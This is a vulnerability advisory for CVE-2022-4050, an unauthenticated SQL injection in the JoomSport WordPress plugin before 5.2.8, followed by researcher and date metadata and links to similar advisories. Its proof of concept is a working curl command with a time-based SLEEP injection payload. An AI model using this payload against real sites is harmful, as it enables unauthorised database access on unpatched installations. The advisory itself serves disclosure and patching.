JoomSport < 5.2.8 – Unauthenticated SQLi | CVE 2022-4050 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted
2. Invoke the following curl command to induce a 10 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load' \
    --data 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'

Affects Plugins

joomsport-sports-league-results-management

Fixed in 5.2.8

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

5c96bb40-4c2d-4e91-8339-e0ddce25912f

Timeline

Publicly Published

2022-11-28 (about 3 years ago)

Added

2022-11-28 (about 3 years ago)

Last Updated

2022-11-28 (about 3 years ago)

Other

Published

Title

Published

2025-04-07

Title

3DPrint Lite <=2.1.3.6 - Authenticated (Admin+) SQL Injection via 'material_text'

Published

2019-05-22

Title

WP Booking System < 1.5.2 - CSRF to Authenticated SQL Injection

Published

2022-04-18

Title

Personal Dictionary < 1.3.4 - Unauthenticated SQLi

Published

2024-08-16

Title

Tutor LMS < 2.7.3 - Authenticated (Administrator+) SQL Injection

Published

2023-11-20

Title

WP Mail Log < 1.1.3 - Editor+ SQL Injection via id